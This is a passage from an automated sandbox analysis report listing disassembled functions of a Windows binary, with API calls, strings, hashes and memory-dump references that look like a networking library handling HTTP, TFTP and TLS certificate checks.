WSAGetLastError.WS2_32(?,?,00000004,?,00000000), ref: 000F81A2
_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000004,?,00000000), ref: 000F81D1

Strings

tftp_tx: giving up waiting for block %d ack, xrefs: 000F816A
Timeout waiting for block %d ACK. Retries = %d, xrefs: 000F804D
tftp_tx: internal error, event: %i, xrefs: 000F8028
Received ACK for block %d, expecting %d, xrefs: 000F8149

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: sendto$ErrorLast_time64
String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
API String ID: 3931062552-2715966420
Opcode ID: 4fb7314cdc15a7ed16aa6fbd020ff2e32d8f465e4ba7c5b4566b41fcf8d47db0
Instruction ID: 0d7f5d1a64fc97cfe9ab8788ab7b52be18244b9d1353aad72ed2c092181326b8
Opcode Fuzzy Hash: 4fb7314cdc15a7ed16aa6fbd020ff2e32d8f465e4ba7c5b4566b41fcf8d47db0
Instruction Fuzzy Hash: 04919D71204B049FD7758F38C885BFAB7E5FB59300F04892EE99AC2661DB30B945EB60

Function 000FF120 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 236networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00000006,00000000), ref: 000FF340
WSAGetLastError.WS2_32 ref: 000FF34A
send.WS2_32(?,?,?,00000000), ref: 000FF3E5
WSAGetLastError.WS2_32 ref: 000FF3EF

Strings

%c%c%c%c%s%c%c, xrefs: 000FF3B1
%c%s%c%s, xrefs: 000FF2CD
%c%c, xrefs: 000FF310
Sending data failed (%d), xrefs: 000FF351, 000FF3F6
%c%c%c%c, xrefs: 000FF1F1
%127[^,]%1[,]%127s, xrefs: 000FF278
%c%s, xrefs: 000FF299

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastsend
String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
API String ID: 1802528911-3533120981
Opcode ID: 97d50616ee2b478b7fc0fa14667de47fa3c23a3d8a9261ead9c0d9da1905b670
Instruction ID: e2b9420a6aa7339193cb53b90b7293985ed3becc14a6a2b72b4d476bbacd087b
Opcode Fuzzy Hash: 97d50616ee2b478b7fc0fa14667de47fa3c23a3d8a9261ead9c0d9da1905b670
Instruction Fuzzy Hash: 8A81E771A44219AFEB60CB14CC45FFA77A8AF44700F0441F5F649EB683DA71AB84DBA0

Function 000F187B Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 225COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000F1902
___from_strstr_to_strchr.LIBCMT ref: 000F1913
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,?,000EA14F,?), ref: 000F1AC8

Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A

Strings

Cookie:, xrefs: 000F1A7E
Host:, xrefs: 000F19BF
Authorization:, xrefs: 000F1A6B
%s, xrefs: 000F1A9B
Connection:, xrefs: 000F1A3C
Transfer-Encoding:, xrefs: 000F1A58
Content-Length:, xrefs: 000F1A20
Content-Type:, xrefs: 000F19E1, 000F19FD

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrfree
String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
API String ID: 653773606-2985882615
Opcode ID: 4d9b0cc107250f7e20405bf7eb2ebd288f75d2dfd1d2bdcdf0e86d45dd685e55
Instruction ID: 256333e0cff31f853820bcaea49054b64f7b84fcb1a0e4c698873c146ce9f76a
Opcode Fuzzy Hash: 4d9b0cc107250f7e20405bf7eb2ebd288f75d2dfd1d2bdcdf0e86d45dd685e55
Instruction Fuzzy Hash: 7271F030F0471ADBDF68CE64E4A07FDB7E1AF44350F24402AD644ABA85DB709D42EB91

Function 000C2DFA Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000001,00000000,00000000), ref: 000C2E50
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000002), ref: 000C2E67
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000103,00000001,00000000,00000000), ref: 000C2EB2
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C2FA9

Strings

PRN, xrefs: 000C2EEC
CON, xrefs: 000C2ED6
LPT, xrefs: 000C2F4C
COM, xrefs: 000C2F3A
AUX, xrefs: 000C2EFE
CLOCK$, xrefs: 000C2F23
NUL, xrefs: 000C2F10

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strncpy$_strdupmalloc
String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
API String ID: 3833483438-925842913
Opcode ID: 1804b859a09d201c39f170653ddb98495dbc909a9903e58d041355ab798e60a5
Instruction ID: b7220a1e563bbec8eda27b4fc123265b665cc5d9972a7efa63b2280a8120cfa4
Opcode Fuzzy Hash: 1804b859a09d201c39f170653ddb98495dbc909a9903e58d041355ab798e60a5
Instruction Fuzzy Hash: 88619D3120460646DF798B348860FFE77E99FA6744F24807DE8829BA82DB748FC68750

Function 000D4F35 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 178stringCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000D4F5C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FD2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FE4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4FF6
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00122984,00000000,00000000,?), ref: 000D5039
___from_strstr_to_strchr.LIBCMT ref: 000D5055
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00122984,00000000,00000000,?), ref: 000D5082
___from_strstr_to_strchr.LIBCMT ref: 000D509A
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(000D5B45,00122984,00000000,00000000,?), ref: 000D50C3
___from_strstr_to_strchr.LIBCMT ref: 000D50DB

Strings

, xrefs: 000D5016

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$freestrcspn
String ID:
API String ID: 2030676775-3916222277
Opcode ID: 8ae176edc626406f82f19ffc79d15caacb3c4f99c29e358932bc09e0059c384e
Instruction ID: 023b16ec6890793a418b008ad96e7007d1d7f0ceca80bbb132fdb63bbf57ee4c
Opcode Fuzzy Hash: 8ae176edc626406f82f19ffc79d15caacb3c4f99c29e358932bc09e0059c384e
Instruction Fuzzy Hash: 7B51C131904719EFDB288F54E8857EEBBF5EF08354F20806FE841A7381DB7199458BA4

Function 000F1C9A Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 166COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1CC2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1D16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1D81
___from_strstr_to_strchr.LIBCMT ref: 000F1DAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1DD1

Strings

Host:, xrefs: 000F1DDC
P, xrefs: 000F1E34
Host: %s%s%s:%d, xrefs: 000F1E96
Host, xrefs: 000F1D1F
Host: %s%s%s, xrefs: 000F1E5F
Host:%s, xrefs: 000F1E05

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr
String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$P
API String ID: 622630536-3255330290
Opcode ID: 3355ff839ac93e217661dbcaf82122303229609540b15249d6e6f307ae447239
Instruction ID: 5b85414db1f92ea8420e3d71d9f7df2f12641bed461e8aa5e6bd525e2f7c8b09
Opcode Fuzzy Hash: 3355ff839ac93e217661dbcaf82122303229609540b15249d6e6f307ae447239
Instruction Fuzzy Hash: F7514431704219EFDB598B24EC80BF97BA6EF44310F18817AED058B792CB709C51ABA0

Function 000C2AA8 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 137stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C2AC3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2ADE
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00117348), ref: 000C2AFC
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00117348), ref: 000C2B19
_mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000), ref: 000C2B9F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C2BAA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C2BB5
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2BD0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2BDB

Strings

%s%s, xrefs: 000C2B44, 000C2B8F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errnofreestrtok$_mkdir_strdupmalloc
String ID: %s%s
API String ID: 2356461126-3252725368
Opcode ID: c9cde391a7b0a76ef054a2f29b0ff545870b4b5b7eec27d2d68bc11db8f9942b
Instruction ID: 1a0721ad6a095d2a1f1f19039c81317854ddb2fd299017d1dd534859699aab25
Opcode Fuzzy Hash: c9cde391a7b0a76ef054a2f29b0ff545870b4b5b7eec27d2d68bc11db8f9942b
Instruction Fuzzy Hash: BB418F35508611EFDB295F74AC44FEE7BF5AF55760B20416EF811D7A81DB708C4186B0

Function 000D0B38 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,00000000,00000002,?), ref: 000D0C07
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000001,?), ref: 000D0C15
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000020,?,?,00000001,?), ref: 000D0C23
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C31
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C3D
RtlVerifyVersionInfo.NTDLL(?,?,00000008,00000001), ref: 000D0C5E
VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1(?,0000003B,00000000,?,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C68

Strings

RtlVerifyVersionInfo, xrefs: 000D0B63
ntdll, xrefs: 000D0B68

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
String ID: RtlVerifyVersionInfo$ntdll
API String ID: 574519269-1699696460
Opcode ID: bf6270d50af0ae20e53b1a6973a73df55a0404647be42af179e2f99eeed0374f
Instruction ID: 528f29cf5c58ca211010e0fb6017a6837586cc3a54d6500cd970962e1ea43cb5
Opcode Fuzzy Hash: bf6270d50af0ae20e53b1a6973a73df55a0404647be42af179e2f99eeed0374f
Instruction Fuzzy Hash: 5331C272548381EFE7218F749C09BAE7BE9FB85714F044A1EF58496291C7B489848B72

Function 000F0AF6 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 140COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F0C07

Strings

Negotiate, xrefs: 000F0B39
Proxy-authorization, xrefs: 000F0B94
Basic, xrefs: 000F0BA8
Server, xrefs: 000F0C74
%s auth using %s with user '%s', xrefs: 000F0C82
Authorization, xrefs: 000F0BDB, 000F0C35
Proxy, xrefs: 000F0C79, 000F0C81
Bearer, xrefs: 000F0BFA
NTLM, xrefs: 000F0B4F
Authorization: Bearer %s, xrefs: 000F0C10
Digest, xrefs: 000F0B69

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %s auth using %s with user '%s'$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
API String ID: 1294909896-3316699798
Opcode ID: 31a6d466ffd660c7f72cc2df71b4c7e4622811d12583ff4ab1050024d6d9213c
Instruction ID: 5499e9e9c8215fc39a6e250811b36ad8de5303baf373f641256fb7414852df34
Opcode Fuzzy Hash: 31a6d466ffd660c7f72cc2df71b4c7e4622811d12583ff4ab1050024d6d9213c
Instruction Fuzzy Hash: FB41793130020DEBCF289B6499507BEB7E2AF90314F24811AE985A7BC3CB71AD00B791

Function 0010D350 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 224COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C

Strings

>, xrefs: 0010D3D8
, xrefs: 0010D38B
-, xrefs: 0010D3AE
, xrefs: 0010D365
, xrefs: 0010D3E8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callocmallocrealloc
String ID: $ $ $-$>
API String ID: 3005434335-2764683982
Opcode ID: cffc967782b2bd0acb4ec27598edeafd4c88f30de89abacab5949edce2377757
Instruction ID: 581f6cc69c4f2af525dbf734695454aeeafe8a3287df108380c7d79634a172b9
Opcode Fuzzy Hash: cffc967782b2bd0acb4ec27598edeafd4c88f30de89abacab5949edce2377757
Instruction Fuzzy Hash: D7816670A14A06AFD728CF69E544725BBF2FB44310F18862AD486C7AD1D7B1F891CBD2

Function 000D4D10 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000D4D69
_strrchr.LIBCMT ref: 000D4D7E
___from_strstr_to_strchr.LIBCMT ref: 000D4D8E
_strrchr.LIBCMT ref: 000D4DE2
___from_strstr_to_strchr.LIBCMT ref: 000D4E13
___from_strstr_to_strchr.LIBCMT ref: 000D4E1F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,000C9BEA,?,00000208,?,?,?,?,?,000CA827,?,?,00000000), ref: 000D4E73
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C9BEA,?,00000208,?,?,?,?,?,000CA827,?,?,00000000), ref: 000D4E8E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000C9BEA,?,00000208,?,?), ref: 000D4EE0

Strings

)i, xrefs: 000D4E50, 000D4E97

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
String ID: )i
API String ID: 3226260525-38996014
Opcode ID: 294442a988c4d1618c9db2244e54685b3f7600a8fe717f6c7cf31b2f31c77144
Instruction ID: 52aa74a2e67425dda2fa48cd46475e323792bc1098278c210ba6d5a067a22b09
Opcode Fuzzy Hash: 294442a988c4d1618c9db2244e54685b3f7600a8fe717f6c7cf31b2f31c77144
Instruction Fuzzy Hash: 6D514831908396BFDB258F6898542AE7BE6EF52350F28407FE08197382EB709C45C771

Function 000F7D59 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7E69
sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7ECD
sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7F6D
WSAGetLastError.WS2_32(?,?,00000000), ref: 000F7F78
_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000000), ref: 000F7FBE

Strings

Received last DATA packet block %d again., xrefs: 000F7F0D
Timeout waiting for block %d ACK. Retries = %d, xrefs: 000F7DC3
Received unexpected DATA packet block %d, expecting block %d, xrefs: 000F7FC9
tftp_rx: internal error, xrefs: 000F7D97

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: sendto$ErrorLast_time64
String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
API String ID: 3931062552-2298932677
Opcode ID: 987f969f9aed096da341e872ce37aa03d2ca752ef2d61ff04403ff372a375ca7
Instruction ID: f195c1f8b205bead5445a293335bb754c1b6fd91264f7099a257fc5cf2df9fcd
Opcode Fuzzy Hash: 987f969f9aed096da341e872ce37aa03d2ca752ef2d61ff04403ff372a375ca7
Instruction Fuzzy Hash: A7719F70208744DFD3358F24CC85FF7BBE5AB59700F04886EEA9E876A1D274A948DB61

Function 000CD136 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177stringCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000CD165
_strrchr.LIBCMT ref: 000CD16F
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000CD198
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002), ref: 000CD1D9
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001), ref: 000CD1F4
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 000CD27A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CD2A4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CD2BD

Strings

://, xrefs: 000CD142
|<>"?*, xrefs: 000CD228

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strrchr$_strdupmallocstrncpy
String ID: ://$|<>"?*
API String ID: 1245388853-1792949323
Opcode ID: c9fc2b0b479589ee994a1018dae484848ad9a25c32ad092736a9ea7530dcd7e4
Instruction ID: b3ffe0c39814d35a79ec5cce3f3336f8492f4ccf50cb292d525849c121d9688b
Opcode Fuzzy Hash: c9fc2b0b479589ee994a1018dae484848ad9a25c32ad092736a9ea7530dcd7e4
Instruction Fuzzy Hash: 28514932A04612AFDB355BA8D864FFEB7E59B62310F28407FEC419B282D770CD419390

Function 0010F1D2 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 164COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F232
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0010F280
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0010F309
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F359

Strings

schannel: server certificate name verification failed, xrefs: 0010F328
schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 0010F33A
schannel: CertGetNameString() returned no certificate name information, xrefs: 0010F20E
schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 0010F2E0
schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 0010F2C9
schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 0010F254

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdupmalloc
String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
API String ID: 111713529-4178580626
Opcode ID: 86b7cd82487365d293f5fbdb3c375a41e0d6f01d6968ca3a37978f4468731300
Instruction ID: 71afcc75986e27a8149ab5e9b3ba118342c2b419270d59b0f29f1203348833d9
Opcode Fuzzy Hash: 86b7cd82487365d293f5fbdb3c375a41e0d6f01d6968ca3a37978f4468731300
Instruction Fuzzy Hash: 3C411E36A04204AADB399E58DC029AD77B5EFC5760F21407EF485A76C1DBB09D43C790

Function 000E6D23 Relevance: 17.6, APIs: 14, Instructions: 107COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
